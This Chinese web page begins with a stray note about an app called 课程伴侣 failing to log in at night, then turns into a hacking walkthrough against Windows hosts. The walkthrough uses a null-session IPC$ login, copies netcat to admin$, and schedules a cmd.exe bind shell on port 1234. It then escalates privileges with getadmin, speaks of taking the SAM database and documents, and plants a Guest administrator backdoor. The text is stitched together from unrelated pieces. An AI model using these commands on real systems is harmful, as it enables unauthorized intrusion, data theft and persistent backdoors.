课程伴侣晚上登不上是因为每晚官方都会进行固定时间的服务器维护,在维护时一般用户是无法进行登录的。课程伴侣自然晚上也就登不上了。F:\》net use \\22218183199\ipc$ "" /user:"Administrator"
命令成功完成。
F:\》copy ncexe \\22218183199\admin$
已复制 1 个文件。
F:\》net time \\22218183199
\\22218183199 的当前时间是 2000/12/25 上午 10:25
在 \\22218183199 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。
F:\》at \\22218183199 10:38 nc -l -p 1234 -t -e cmdexe
新增加了一项作业,其作业 ID = 0
F:\》telnet 22218183199 1234
上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schedule服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。
F:\》at \\122218183199 10:38 nc -l -p 1234 -t -e cmdexe
服务仍未启动。
F:\》netsvc \\139223200xxx schedule /start
Service is running on \\139223200xxx
登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。
F:\》copy getadminexe \\139223200xxx\admin$
已复制 1 个文件。
F:\》copy gasysdll \\139223200xxx\admin$
已复制 1 个文件。
其次,在远程主机运行下面的命令。
C:\WINNT\system32》getadmin
如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-)
那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。。。
其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。
作完了你要做的事,不要忘了做个后门。
C:\WINNT\system32》net user Guest 30906766
net use Guest 30906766
The command completed successfully
C:\WINNT\system32》net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully
是不是小容的流光啊``怎么连user:" (用户名) 和 ipc$ ""(密码) 都找不了
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)